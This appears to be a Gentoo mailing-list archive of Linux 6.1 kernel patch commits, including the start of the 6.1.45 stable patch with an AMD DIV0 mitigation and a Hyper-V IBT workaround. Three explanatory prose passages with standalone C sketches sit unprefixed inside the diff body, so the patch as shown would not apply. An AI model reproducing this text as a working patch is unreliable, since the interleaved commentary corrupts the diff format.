+ 		[ -n "$_flags" ] && expected_line="$expected_line ${_flags//","/" "}"
+ 		[ -n "$dev" ] && expected_line="$expected_line $dev"
+diff --git a/tools/testing/selftests/rseq/Makefile b/tools/testing/selftests/rseq/Makefile
+index 3a173e184566c..cb5a9fc629fed 100644
+--- a/tools/testing/selftests/rseq/Makefile
++++ b/tools/testing/selftests/rseq/Makefile
+@@ -4,8 +4,10 @@ ifneq ($(shell $(CC) --version 2>&1 | head -n 1 | grep clang),)
+ CLANG_FLAGS += -no-integrated-as
+ endif
+ 
++top_srcdir = ../../../..
++
+ CFLAGS += -O2 -Wall -g -I./ $(KHDR_INCLUDES) -L$(OUTPUT) -Wl,-rpath=./ \
+-	  $(CLANG_FLAGS)
++	  $(CLANG_FLAGS) -I$(top_srcdir)/tools/include
+ LDLIBS += -lpthread -ldl
+ 
+ # Own dependencies because we only want to build against 1st prerequisite, but
+diff --git a/tools/testing/selftests/rseq/rseq.c b/tools/testing/selftests/rseq/rseq.c
+index b736a5169aad0..e20191fb40d49 100644
+--- a/tools/testing/selftests/rseq/rseq.c
++++ b/tools/testing/selftests/rseq/rseq.c
+@@ -29,6 +29,8 @@
+ #include <dlfcn.h>
+ #include <stddef.h>
+ 
++#include <linux/compiler.h>
++
+ #include "../kselftest.h"
+ #include "rseq.h"
+ 


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-08-16 18:32 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-08-16 18:32 UTC (permalink / raw
  To: gentoo-commits

commit:     ea90beb9c82adf6fda470602f76f36087cf9c712
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Wed Aug 16 18:32:22 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Wed Aug 16 18:32:22 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=ea90beb9

Remove redundant patch

Removed:
2930_gcc-plugins-Reorg-gimple-incs-for-gcc-13.patch

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README                                        |  4 ---
 ..._gcc-plugins-Reorg-gimple-incs-for-gcc-13.patch | 41 ----------------------
 2 files changed, 45 deletions(-)

diff --git a/0000_README b/0000_README
index 0e741144..c1bcb313 100644
--- a/0000_README
+++ b/0000_README
@@ -255,10 +255,6 @@ Patch:  2920_sign-file-patch-for-libressl.patch
 From:   https://bugs.gentoo.org/717166
 Desc:   sign-file: full functionality with modern LibreSSL
 
-Patch:	2930_gcc-plugins-Reorg-gimple-incs-for-gcc-13.patch
-From:   https://lore.kernel.org/lkml/mhng-8bc81919-3023-4d72-bd44-2443606b4fd7@palmer-ri-x1c9a/T/
-Desc:   gcc-plugins: Reorganize gimple includes for GCC 13
-
 Patch:  3000_Support-printing-firmware-info.patch
 From:   https://bugs.gentoo.org/732852
 Desc:   Print firmware info (Reqs CONFIG_GENTOO_PRINT_FIRMWARE_INFO). Thanks to Georgy Yakovlev

diff --git a/2930_gcc-plugins-Reorg-gimple-incs-for-gcc-13.patch b/2930_gcc-plugins-Reorg-gimple-incs-for-gcc-13.patch
deleted file mode 100644
index 0b454ec8..00000000
--- a/2930_gcc-plugins-Reorg-gimple-incs-for-gcc-13.patch
+++ /dev/null
@@ -1,41 +0,0 @@
-gcc-plugins: Reorganize gimple includes for GCC 13
-
-The gimple-iterator.h header must be included before gimple-fold.h
-starting with GCC 13. Reorganize gimple headers to work for all GCC
-versions.
-
-Reported-by: Palmer Dabbelt <palmer@rivosinc.com>
-Link: https://lore.kernel.org/all/20230113173033.4380-1-palmer@rivosinc.com/
-Cc: linux-hardening@vger.kernel.org
-Signed-off-by: Kees Cook <keescook@chromium.org>
----
- scripts/gcc-plugins/gcc-common.h | 4 ++--
- 1 file changed, 2 insertions(+), 2 deletions(-)
-
-diff --git a/scripts/gcc-plugins/gcc-common.h b/scripts/gcc-plugins/gcc-common.h
-index 9a1895747b15..84c730da36dd 100644
---- a/scripts/gcc-plugins/gcc-common.h
-+++ b/scripts/gcc-plugins/gcc-common.h
-@@ -71,7 +71,9 @@
- #include "varasm.h"
- #include "stor-layout.h"
- #include "internal-fn.h"
-+#include "gimple.h"
- #include "gimple-expr.h"
-+#include "gimple-iterator.h"
- #include "gimple-fold.h"
- #include "context.h"
- #include "tree-ssa-alias.h"
-@@ -85,10 +87,8 @@
- #include "tree-eh.h"
- #include "stmt.h"
- #include "gimplify.h"
--#include "gimple.h"
- #include "tree-phinodes.h"
- #include "tree-cfg.h"
--#include "gimple-iterator.h"
- #include "gimple-ssa.h"
- #include "ssa-iterators.h"
- 
--- 
-2.34.1


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-08-11 11:55 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-08-11 11:55 UTC (permalink / raw
  To: gentoo-commits

commit:     fe4e8e348309528622daba47768078aa5fd91e58
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Fri Aug 11 11:55:10 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Fri Aug 11 11:55:10 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=fe4e8e34

Linux patch 6.1.45

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |    4 +
 1044_linux-6.1.45.patch | 5988 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 5992 insertions(+)

diff --git a/0000_README b/0000_README
index 12241a14..93d96552 100644
--- a/0000_README
+++ b/0000_README
@@ -219,6 +219,10 @@ Patch:  1043_linux-6.1.44.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.44
 
+Patch:  1044_linux-6.1.45.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.45
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1044_linux-6.1.45.patch b/1044_linux-6.1.45.patch
new file mode 100644
index 00000000..22547410
--- /dev/null
+++ b/1044_linux-6.1.45.patch
@@ -0,0 +1,5988 @@
+diff --git a/Documentation/arm64/silicon-errata.rst b/Documentation/arm64/silicon-errata.rst
+index bbc80eff03f98..b3c8ac6a2c385 100644
+--- a/Documentation/arm64/silicon-errata.rst
++++ b/Documentation/arm64/silicon-errata.rst
+@@ -141,6 +141,10 @@ stable kernels.
+ +----------------+-----------------+-----------------+-----------------------------+
+ | ARM            | MMU-500         | #841119,826419  | N/A                         |
+ +----------------+-----------------+-----------------+-----------------------------+
++| ARM            | MMU-600         | #1076982,1209401| N/A                         |
+++----------------+-----------------+-----------------+-----------------------------+
++| ARM            | MMU-700         | #2268618,2812531| N/A                         |
+++----------------+-----------------+-----------------+-----------------------------+
+ +----------------+-----------------+-----------------+-----------------------------+
+ | Broadcom       | Brahma-B53      | N/A             | ARM64_ERRATUM_845719        |
+ +----------------+-----------------+-----------------+-----------------------------+
+diff --git a/Makefile b/Makefile
+index 612f3d83629b4..82c958299e982 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 44
++SUBLEVEL = 45
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm64/boot/dts/altera/socfpga_stratix10_socdk.dts b/arch/arm64/boot/dts/altera/socfpga_stratix10_socdk.dts
+index 48424e459f125..15b5651b88d03 100644
+--- a/arch/arm64/boot/dts/altera/socfpga_stratix10_socdk.dts
++++ b/arch/arm64/boot/dts/altera/socfpga_stratix10_socdk.dts
+@@ -128,7 +128,7 @@
+ 	status = "okay";
+ 	clock-frequency = <100000>;
+ 	i2c-sda-falling-time-ns = <890>;  /* hcnt */
+-	i2c-sdl-falling-time-ns = <890>;  /* lcnt */
++	i2c-scl-falling-time-ns = <890>;  /* lcnt */
+ 
+ 	adc@14 {
+ 		compatible = "lltc,ltc2497";
+diff --git a/arch/arm64/boot/dts/altera/socfpga_stratix10_socdk_nand.dts b/arch/arm64/boot/dts/altera/socfpga_stratix10_socdk_nand.dts
+index 847a7c01f5af5..fcf640de90b6b 100644
+--- a/arch/arm64/boot/dts/altera/socfpga_stratix10_socdk_nand.dts
++++ b/arch/arm64/boot/dts/altera/socfpga_stratix10_socdk_nand.dts
+@@ -141,7 +141,7 @@
+ 	status = "okay";
+ 	clock-frequency = <100000>;
+ 	i2c-sda-falling-time-ns = <890>;  /* hcnt */
+-	i2c-sdl-falling-time-ns = <890>;  /* lcnt */
++	i2c-scl-falling-time-ns = <890>;  /* lcnt */
+ 
+ 	adc@14 {
+ 		compatible = "lltc,ltc2497";
+diff --git a/arch/arm64/boot/dts/freescale/imx8mm-phyboard-polis-rdk.dts b/arch/arm64/boot/dts/freescale/imx8mm-phyboard-polis-rdk.dts
+index 4a3df2b77b0be..6720ddf597839 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mm-phyboard-polis-rdk.dts
++++ b/arch/arm64/boot/dts/freescale/imx8mm-phyboard-polis-rdk.dts
+@@ -141,7 +141,7 @@
+ };
+ 
+ &gpio1 {
+-	gpio-line-names = "nINT_ETHPHY", "LED_RED", "WDOG_INT", "X_RTC_INT",
++	gpio-line-names = "", "LED_RED", "WDOG_INT", "X_RTC_INT",
+ 		"", "", "", "RESET_ETHPHY",
+ 		"CAN_nINT", "CAN_EN", "nENABLE_FLATLINK", "",
+ 		"USB_OTG_VBUS_EN", "", "LED_GREEN", "LED_BLUE";
+diff --git a/arch/arm64/boot/dts/freescale/imx8mm-phycore-som.dtsi b/arch/arm64/boot/dts/freescale/imx8mm-phycore-som.dtsi
+index 995b44efb1b65..9d9b103c79c77 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mm-phycore-som.dtsi
++++ b/arch/arm64/boot/dts/freescale/imx8mm-phycore-som.dtsi
+@@ -111,7 +111,7 @@
+ };
+ 
+ &gpio1 {
+-	gpio-line-names = "nINT_ETHPHY", "", "WDOG_INT", "X_RTC_INT",
++	gpio-line-names = "", "", "WDOG_INT", "X_RTC_INT",
+ 		"", "", "", "RESET_ETHPHY",
+ 		"", "", "nENABLE_FLATLINK";
+ };
+@@ -210,7 +210,7 @@
+ 				};
+ 			};
+ 
+-			reg_vdd_gpu: buck3 {
++			reg_vdd_vpu: buck3 {
+ 				regulator-always-on;
+ 				regulator-boot-on;
+ 				regulator-max-microvolt = <1000000>;
+diff --git a/arch/arm64/boot/dts/freescale/imx8mm-venice-gw7903.dts b/arch/arm64/boot/dts/freescale/imx8mm-venice-gw7903.dts
+index 8e861b920d09e..7c9b60f4da922 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mm-venice-gw7903.dts
++++ b/arch/arm64/boot/dts/freescale/imx8mm-venice-gw7903.dts
+@@ -559,6 +559,10 @@
+ 	status = "okay";
+ };
+ 
++&disp_blk_ctrl {
++	status = "disabled";
++};
++
+ &pgc_mipi {
+ 	status = "disabled";
+ };
+diff --git a/arch/arm64/boot/dts/freescale/imx8mm-venice-gw7904.dts b/arch/arm64/boot/dts/freescale/imx8mm-venice-gw7904.dts
+index a67771d021464..46a07dfc0086c 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mm-venice-gw7904.dts
++++ b/arch/arm64/boot/dts/freescale/imx8mm-venice-gw7904.dts
+@@ -617,6 +617,10 @@
+ 	status = "okay";
+ };
+ 
++&disp_blk_ctrl {
++	status = "disabled";
++};
++
+ &pgc_mipi {
+ 	status = "disabled";
+ };
+diff --git a/arch/arm64/boot/dts/freescale/imx8mn-var-som.dtsi b/arch/arm64/boot/dts/freescale/imx8mn-var-som.dtsi
+index d053ef302fb82..faafefe562e4b 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mn-var-som.dtsi
++++ b/arch/arm64/boot/dts/freescale/imx8mn-var-som.dtsi
+@@ -351,7 +351,7 @@
+ 			MX8MN_IOMUXC_ENET_RXC_ENET1_RGMII_RXC		0x91
+ 			MX8MN_IOMUXC_ENET_RX_CTL_ENET1_RGMII_RX_CTL	0x91
+ 			MX8MN_IOMUXC_ENET_TX_CTL_ENET1_RGMII_TX_CTL	0x1f
+-			MX8MN_IOMUXC_GPIO1_IO09_GPIO1_IO9		0x19
++			MX8MN_IOMUXC_GPIO1_IO09_GPIO1_IO9		0x159
+ 		>;
+ 	};
+ 
+diff --git a/arch/arm64/boot/dts/freescale/imx8mq.dtsi b/arch/arm64/boot/dts/freescale/imx8mq.dtsi
+index 4724ed0cbff94..bf8f02c1535c1 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mq.dtsi
++++ b/arch/arm64/boot/dts/freescale/imx8mq.dtsi
+@@ -756,7 +756,7 @@
+ 									 <&clk IMX8MQ_SYS1_PLL_800M>,
+ 									 <&clk IMX8MQ_VPU_PLL>;
+ 						assigned-clock-rates = <600000000>,
+-								       <600000000>,
++								       <300000000>,
+ 								       <800000000>,
+ 								       <0>;
+ 					};
+diff --git a/arch/arm64/kernel/fpsimd.c b/arch/arm64/kernel/fpsimd.c
+index 59aaf2e688336..356036babd093 100644
+--- a/arch/arm64/kernel/fpsimd.c
++++ b/arch/arm64/kernel/fpsimd.c
+@@ -634,7 +634,7 @@ static void fpsimd_to_sve(struct task_struct *task)
+ 	void *sst = task->thread.sve_state;
+ 	struct user_fpsimd_state const *fst = &task->thread.uw.fpsimd_state;
+ 
+-	if (!system_supports_sve())
++	if (!system_supports_sve() && !system_supports_sme())
+ 		return;
+ 
+ 	vq = sve_vq_from_vl(thread_get_cur_vl(&task->thread));
+@@ -660,7 +660,7 @@ static void sve_to_fpsimd(struct task_struct *task)
+ 	unsigned int i;
+ 	__uint128_t const *p;
+ 
+-	if (!system_supports_sve())
++	if (!system_supports_sve() && !system_supports_sme())
+ 		return;
+ 
+ 	vl = thread_get_cur_vl(&task->thread);
+@@ -791,7 +791,8 @@ void sve_sync_from_fpsimd_zeropad(struct task_struct *task)
+ 	void *sst = task->thread.sve_state;
+ 	struct user_fpsimd_state const *fst = &task->thread.uw.fpsimd_state;
+ 
+-	if (!test_tsk_thread_flag(task, TIF_SVE))
++	if (!test_tsk_thread_flag(task, TIF_SVE) &&
++	    !thread_sm_enabled(&task->thread))
+ 		return;
+ 
+ 	vq = sve_vq_from_vl(thread_get_cur_vl(&task->thread));
+@@ -863,7 +864,7 @@ int vec_set_vector_length(struct task_struct *task, enum vec_type type,
+ 			 */
+ 			task->thread.svcr &= ~(SVCR_SM_MASK |
+ 					       SVCR_ZA_MASK);
+-			clear_thread_flag(TIF_SME);
++			clear_tsk_thread_flag(task, TIF_SME);
+ 			free_sme = true;
+ 		}
+ 	}
+diff --git a/arch/arm64/kernel/ptrace.c b/arch/arm64/kernel/ptrace.c
+index 92bc9a2d702cb..f19f020ccff96 100644
+--- a/arch/arm64/kernel/ptrace.c
++++ b/arch/arm64/kernel/ptrace.c
+@@ -937,11 +937,13 @@ static int sve_set_common(struct task_struct *target,
+ 	/*
+ 	 * Ensure target->thread.sve_state is up to date with target's
+ 	 * FPSIMD regs, so that a short copyin leaves trailing
+-	 * registers unmodified.  Always enable SVE even if going into
+-	 * streaming mode.
++	 * registers unmodified.  Only enable SVE if we are
++	 * configuring normal SVE; a system with streaming SVE may not
++	 * have normal SVE.
+ 	 */
+ 	fpsimd_sync_to_sve(target);
+-	set_tsk_thread_flag(target, TIF_SVE);
++	if (type == ARM64_VEC_SVE)
++		set_tsk_thread_flag(target, TIF_SVE);
+ 
+ 	BUILD_BUG_ON(SVE_PT_SVE_OFFSET != sizeof(header));
+ 	start = SVE_PT_SVE_OFFSET;
+diff --git a/arch/powerpc/include/asm/word-at-a-time.h b/arch/powerpc/include/asm/word-at-a-time.h
+index 46c31fb8748d5..30a12d2086871 100644
+--- a/arch/powerpc/include/asm/word-at-a-time.h
++++ b/arch/powerpc/include/asm/word-at-a-time.h
+@@ -34,7 +34,7 @@ static inline long find_zero(unsigned long mask)
+ 	return leading_zero_bits >> 3;
+ }
+ 
+-static inline bool has_zero(unsigned long val, unsigned long *data, const struct word_at_a_time *c)
++static inline unsigned long has_zero(unsigned long val, unsigned long *data, const struct word_at_a_time *c)
+ {
+ 	unsigned long rhs = val | c->low_bits;
+ 	*data = rhs;
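
The type change lines the big-endian powerpc variant up with the generic little-endian implementation, which returns the detection mask as unsigned long; callers such as fs/namei.c's hash_name() combine two has_zero() results with a bitwise OR, so keeping full-width mask semantics avoids mixed-width surprises. For background, a self-contained userspace sketch of the zero-byte detection idiom (the helper names mirror the kernel's, but this is only an illustration; it consumes the returned mask directly where the kernel routes it through prep_zero_mask()):

#include <stdio.h>
#include <string.h>

#define ONES  0x0101010101010101UL
#define HIGHS 0x8080808080808080UL

/* Nonzero iff v contains a zero byte.  The value is a mask whose lowest
 * set high bit marks the first zero byte; higher bytes may carry false
 * positives from borrow propagation, which is harmless when only the
 * first hit is consumed. */
static unsigned long has_zero(unsigned long v)
{
	return (v - ONES) & ~v & HIGHS;
}

/* Byte index of the first zero byte on a little-endian machine
 * (__builtin_ctzl is a GCC/Clang builtin). */
static int find_zero(unsigned long mask)
{
	return __builtin_ctzl(mask) >> 3;
}

int main(void)
{
	unsigned long w, mask;

	memcpy(&w, "abc\0defg", sizeof(w));
	mask = has_zero(w);
	if (mask)
		printf("first zero byte at index %d\n", find_zero(mask));
	return 0;
}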
+diff --git a/arch/powerpc/kernel/trace/ftrace_mprofile.S b/arch/powerpc/kernel/trace/ftrace_mprofile.S
+index d031093bc4367..6f9c2dea905b7 100644
+--- a/arch/powerpc/kernel/trace/ftrace_mprofile.S
++++ b/arch/powerpc/kernel/trace/ftrace_mprofile.S
+@@ -33,6 +33,9 @@
+  * and then arrange for the ftrace function to be called.
+  */
+ .macro	ftrace_regs_entry allregs
++	/* Create a minimal stack frame for representing B */
++	PPC_STLU	r1, -STACK_FRAME_MIN_SIZE(r1)
++
+ 	/* Create our stack frame + pt_regs */
+ 	PPC_STLU	r1,-SWITCH_FRAME_SIZE(r1)
+ 
+@@ -42,7 +45,7 @@
+ 
+ #ifdef CONFIG_PPC64
+ 	/* Save the original return address in A's stack frame */
+-	std	r0, LRSAVE+SWITCH_FRAME_SIZE(r1)
++	std	r0, LRSAVE+SWITCH_FRAME_SIZE+STACK_FRAME_MIN_SIZE(r1)
+ 	/* Ok to continue? */
+ 	lbz	r3, PACA_FTRACE_ENABLED(r13)
+ 	cmpdi	r3, 0
+@@ -77,6 +80,8 @@
+ 	mflr	r7
+ 	/* Save it as pt_regs->nip */
+ 	PPC_STL	r7, _NIP(r1)
++	/* Also save it in B's stackframe header for proper unwind */
++	PPC_STL	r7, LRSAVE+SWITCH_FRAME_SIZE(r1)
+ 	/* Save the read LR in pt_regs->link */
+ 	PPC_STL	r0, _LINK(r1)
+ 
+@@ -142,7 +147,7 @@
+ #endif
+ 
+ 	/* Pop our stack frame */
+-	addi r1, r1, SWITCH_FRAME_SIZE
++	addi r1, r1, SWITCH_FRAME_SIZE+STACK_FRAME_MIN_SIZE
+ 
+ #ifdef CONFIG_LIVEPATCH_64
+         /* Based on the cmpd above, if the NIP was altered handle livepatch */
+diff --git a/arch/powerpc/mm/init_64.c b/arch/powerpc/mm/init_64.c
+index fe1b83020e0df..0ec5b45b1e86a 100644
+--- a/arch/powerpc/mm/init_64.c
++++ b/arch/powerpc/mm/init_64.c
+@@ -314,8 +314,7 @@ void __ref vmemmap_free(unsigned long start, unsigned long end,
+ 	start = ALIGN_DOWN(start, page_size);
+ 	if (altmap) {
+ 		alt_start = altmap->base_pfn;
+-		alt_end = altmap->base_pfn + altmap->reserve +
+-			  altmap->free + altmap->alloc + altmap->align;
++		alt_end = altmap->base_pfn + altmap->reserve + altmap->free;
+ 	}
+ 
+ 	pr_debug("vmemmap_free %lx...%lx\n", start, end);
+diff --git a/arch/s390/kernel/sthyi.c b/arch/s390/kernel/sthyi.c
+index 4d141e2c132e5..2ea7f208f0e73 100644
+--- a/arch/s390/kernel/sthyi.c
++++ b/arch/s390/kernel/sthyi.c
+@@ -459,9 +459,9 @@ static int sthyi_update_cache(u64 *rc)
+  *
+  * Fills the destination with system information returned by the STHYI
+  * instruction. The data is generated by emulation or execution of STHYI,
+- * if available. The return value is the condition code that would be
+- * returned, the rc parameter is the return code which is passed in
+- * register R2 + 1.
++ * if available. The return value is either a negative error value or
++ * the condition code that would be returned; the rc parameter is the
++ * return code, which is passed in register R2 + 1.
+  */
+ int sthyi_fill(void *dst, u64 *rc)
+ {
+diff --git a/arch/s390/kvm/intercept.c b/arch/s390/kvm/intercept.c
+index ee7478a601442..b37bb960bfaf0 100644
+--- a/arch/s390/kvm/intercept.c
++++ b/arch/s390/kvm/intercept.c
+@@ -389,8 +389,8 @@ static int handle_partial_execution(struct kvm_vcpu *vcpu)
+  */
+ int handle_sthyi(struct kvm_vcpu *vcpu)
+ {
+-	int reg1, reg2, r = 0;
+-	u64 code, addr, cc = 0, rc = 0;
++	int reg1, reg2, cc = 0, r = 0;
++	u64 code, addr, rc = 0;
+ 	struct sthyi_sctns *sctns = NULL;
+ 
+ 	if (!test_kvm_facility(vcpu->kvm, 74))
+@@ -421,7 +421,10 @@ int handle_sthyi(struct kvm_vcpu *vcpu)
+ 		return -ENOMEM;
+ 
+ 	cc = sthyi_fill(sctns, &rc);
+-
++	if (cc < 0) {
++		free_page((unsigned long)sctns);
++		return cc;
++	}
+ out:
+ 	if (!cc) {
+ 		if (kvm_s390_pv_cpu_is_protected(vcpu)) {
+diff --git a/arch/x86/hyperv/hv_init.c b/arch/x86/hyperv/hv_init.c
+index 85863b9c9e684..189ae92de4d06 100644
+--- a/arch/x86/hyperv/hv_init.c
++++ b/arch/x86/hyperv/hv_init.c
+@@ -14,6 +14,7 @@
+ #include <asm/apic.h>
+ #include <asm/desc.h>
+ #include <asm/sev.h>
++#include <asm/ibt.h>
+ #include <asm/hypervisor.h>
+ #include <asm/hyperv-tlfs.h>
+ #include <asm/mshyperv.h>
+@@ -467,6 +468,26 @@ void __init hyperv_init(void)
+ 		wrmsrl(HV_X64_MSR_HYPERCALL, hypercall_msr.as_uint64);
+ 	}
+ 
++	/*
++	 * Some versions of Hyper-V that provide IBT in guest VMs have a bug
++	 * in that there's no ENDBR64 instruction at the entry to the
++	 * hypercall page. Because hypercalls are invoked via an indirect call
++	 * to the hypercall page, all hypercall attempts fail when IBT is
++	 * enabled, and Linux panics. For such buggy versions, disable IBT.
++	 *
++	 * Fixed versions of Hyper-V always provide ENDBR64 on the hypercall
++	 * page, so if future Linux kernel versions enable IBT for 32-bit
++	 * builds, additional hypercall page hackery will be required here
++	 * to provide an ENDBR32.
++	 */
++#ifdef CONFIG_X86_KERNEL_IBT
++	if (cpu_feature_enabled(X86_FEATURE_IBT) &&
++	    *(u32 *)hv_hypercall_pg != gen_endbr()) {
++		setup_clear_cpu_cap(X86_FEATURE_IBT);
++		pr_warn("Hyper-V: Disabling IBT because of Hyper-V bug\n");
++	}
++#endif
++
+ 	/*
+ 	 * hyperv_init() is called before LAPIC is initialized: see
+ 	 * apic_intr_mode_init() -> x86_platform.apic_post_init() and
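
The comparison against gen_endbr() works because ENDBR64 has a fixed four-byte encoding, f3 0f 1e fa, which reads back as the little-endian u32 0xfa1e0ff3; a hypercall page built without it therefore fails the test on its very first bytes. A hypothetical userspace sketch of the same first-instruction check (constant and names are assumptions for illustration):

#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* endbr64 encodes as f3 0f 1e fa; read as a little-endian u32 that is: */
#define ENDBR64_INSN 0xfa1e0ff3u

static int page_starts_with_endbr64(const void *page)
{
	uint32_t insn;

	memcpy(&insn, page, sizeof(insn));
	return insn == ENDBR64_INSN;
}

int main(void)
{
	uint8_t fake_page[16] = { 0xf3, 0x0f, 0x1e, 0xfa, 0xc3 }; /* endbr64; ret */

	printf("%s\n", page_starts_with_endbr64(fake_page) ?
	       "IBT-compatible" : "no ENDBR64, disable IBT");
	return 0;
}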
+diff --git a/arch/x86/include/asm/cpufeatures.h b/arch/x86/include/asm/cpufeatures.h
+index e721b8426c245..b122708792c4d 100644
+--- a/arch/x86/include/asm/cpufeatures.h
++++ b/arch/x86/include/asm/cpufeatures.h
+@@ -476,4 +476,5 @@
+ 
+ /* BUG word 2 */
+ #define X86_BUG_SRSO			X86_BUG(1*32 + 0) /* AMD SRSO bug */
++#define X86_BUG_DIV0			X86_BUG(1*32 + 1) /* AMD DIV0 speculation bug */
+ #endif /* _ASM_X86_CPUFEATURES_H */
+diff --git a/arch/x86/include/asm/processor.h b/arch/x86/include/asm/processor.h
+index c13e4ff8ec70c..45bf26862b99b 100644
+--- a/arch/x86/include/asm/processor.h
++++ b/arch/x86/include/asm/processor.h
+@@ -801,10 +801,12 @@ extern u16 get_llc_id(unsigned int cpu);
+ extern u32 amd_get_nodes_per_socket(void);
+ extern u32 amd_get_highest_perf(void);
+ extern bool cpu_has_ibpb_brtype_microcode(void);
++extern void amd_clear_divider(void);
+ #else
+ static inline u32 amd_get_nodes_per_socket(void)	{ return 0; }
+ static inline u32 amd_get_highest_perf(void)		{ return 0; }
+ static inline bool cpu_has_ibpb_brtype_microcode(void)	{ return false; }
++static inline void amd_clear_divider(void)		{ }
+ #endif
+ 
+ #define for_each_possible_hypervisor_cpuid_base(function) \
+diff --git a/arch/x86/kernel/cpu/amd.c b/arch/x86/kernel/cpu/amd.c
+index 7f0cf4a959c02..43910eb55b2e9 100644
+--- a/arch/x86/kernel/cpu/amd.c
++++ b/arch/x86/kernel/cpu/amd.c
+@@ -75,6 +75,10 @@ static const int amd_zenbleed[] =
+ 			   AMD_MODEL_RANGE(0x17, 0x60, 0x0, 0x7f, 0xf),
+ 			   AMD_MODEL_RANGE(0x17, 0xa0, 0x0, 0xaf, 0xf));
+ 
++static const int amd_div0[] =
++	AMD_LEGACY_ERRATUM(AMD_MODEL_RANGE(0x17, 0x00, 0x0, 0x2f, 0xf),
++			   AMD_MODEL_RANGE(0x17, 0x50, 0x0, 0x5f, 0xf));
++
+ static bool cpu_has_amd_erratum(struct cpuinfo_x86 *cpu, const int *erratum)
+ {
+ 	int osvw_id = *erratum++;
+@@ -1115,6 +1119,11 @@ static void init_amd(struct cpuinfo_x86 *c)
+ 	check_null_seg_clears_base(c);
+ 
+ 	zenbleed_check(c);
++
++	if (cpu_has_amd_erratum(c, amd_div0)) {
++		pr_notice_once("AMD Zen1 DIV0 bug detected. Disable SMT for full protection.\n");
++		setup_force_cpu_bug(X86_BUG_DIV0);
++	}
+ }
+ 
+ #ifdef CONFIG_X86_32
+@@ -1275,3 +1284,13 @@ void amd_check_microcode(void)
+ {
+ 	on_each_cpu(zenbleed_check_cpu, NULL, 1);
+ }
++
++/*
++ * Issue a DIV 0/1 insn to clear any division data from previous DIV
++ * operations.
++ */
++void noinstr amd_clear_divider(void)
++{
++	asm volatile(ALTERNATIVE("", "div %2\n\t", X86_BUG_DIV0)
++		     :: "a" (0), "d" (0), "r" (1));
++}
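
The mitigation itself is one benign division; ALTERNATIVE() patches it in only when X86_BUG_DIV0 is set, so unaffected CPUs execute nothing extra. Roughly what the patched-in instruction amounts to, as a hypothetical x86-64 userspace sketch rather than the kernel's alternatives machinery:

static void clear_divider_sketch(void)
{
	unsigned int lo = 0, hi = 0, one = 1;

	/* 32-bit div: EDX:EAX / one; quotient to EAX, remainder to EDX.
	 * 0 / 1 cannot fault and overwrites any stale divider state. */
	asm volatile("div %2" : "+a" (lo), "+d" (hi) : "r" (one));
}

int main(void)
{
	clear_divider_sketch();
	return 0;
}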
+diff --git a/arch/x86/kernel/traps.c b/arch/x86/kernel/traps.c
+index c0a5a4f225d9a..7e8795d8b0f17 100644
+--- a/arch/x86/kernel/traps.c
++++ b/arch/x86/kernel/traps.c
+@@ -206,6 +206,8 @@ DEFINE_IDTENTRY(exc_divide_error)
+ {
+ 	do_error_trap(regs, 0, "divide error", X86_TRAP_DE, SIGFPE,
+ 		      FPE_INTDIV, error_get_trap_addr(regs));
++
++	amd_clear_divider();
+ }
+ 
+ DEFINE_IDTENTRY(exc_overflow)
+diff --git a/drivers/block/rbd.c b/drivers/block/rbd.c
+index daec0321cd76b..74ef3da545361 100644
+--- a/drivers/block/rbd.c
++++ b/drivers/block/rbd.c
+@@ -3676,7 +3676,7 @@ static int rbd_lock(struct rbd_device *rbd_dev)
+ 	ret = ceph_cls_lock(osdc, &rbd_dev->header_oid, &rbd_dev->header_oloc,
+ 			    RBD_LOCK_NAME, CEPH_CLS_LOCK_EXCLUSIVE, cookie,
+ 			    RBD_LOCK_TAG, "", 0);
+-	if (ret)
++	if (ret && ret != -EEXIST)
+ 		return ret;
+ 
+ 	__rbd_lock(rbd_dev, cookie);
+@@ -3879,7 +3879,7 @@ static struct ceph_locker *get_lock_owner_info(struct rbd_device *rbd_dev)
+ 				 &rbd_dev->header_oloc, RBD_LOCK_NAME,
+ 				 &lock_type, &lock_tag, &lockers, &num_lockers);
+ 	if (ret) {
+-		rbd_warn(rbd_dev, "failed to retrieve lockers: %d", ret);
++		rbd_warn(rbd_dev, "failed to get header lockers: %d", ret);
+ 		return ERR_PTR(ret);
+ 	}
+ 
+@@ -3941,8 +3941,10 @@ static int find_watcher(struct rbd_device *rbd_dev,
+ 	ret = ceph_osdc_list_watchers(osdc, &rbd_dev->header_oid,
+ 				      &rbd_dev->header_oloc, &watchers,
+ 				      &num_watchers);
+-	if (ret)
++	if (ret) {
++		rbd_warn(rbd_dev, "failed to get watchers: %d", ret);
+ 		return ret;
++	}
+ 
+ 	sscanf(locker->id.cookie, RBD_LOCK_COOKIE_PREFIX " %llu", &cookie);
